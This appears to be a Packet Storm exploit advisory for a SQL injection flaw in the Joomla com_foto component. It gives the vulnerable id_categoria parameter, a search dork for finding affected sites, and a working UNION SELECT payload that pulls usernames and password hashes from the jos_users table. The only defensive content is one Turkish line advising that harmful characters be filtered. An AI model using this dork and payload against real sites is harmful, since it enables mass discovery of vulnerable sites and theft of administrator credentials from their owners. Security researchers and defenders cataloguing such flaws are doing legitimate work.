Joomla Foto SQL Injection

2011-07-15T00:00:00
ID PACKETSTORM:103077
Type packetstorm
Reporter SOLVER
Modified 2011-07-15T00:00:00

Description

                                        
                                            `<------------------- header data start ------------------- >  
#############################################################  
Joomla Component Com_foto SQL Injection Vulnerability   
#############################################################  
  
# Author : SOLVER ~ Bug Researchers  
  
# Date : 18.06.2011  
  
# Name : Joomla com_foto  
  
# Bug Type : SQL injection  
  
# Infection : Admin Login Bilgileri Alinabilir.  
  
# Example Vuln :  
  
[+]/index.php?option=com_foto&task=categoria&id_categoria=[EXPLOIT]  
  
[+] Dork:inurl:"com_foto"  
  
[+] Demo: http://site/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users--  
  
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.  
#############################################################  
`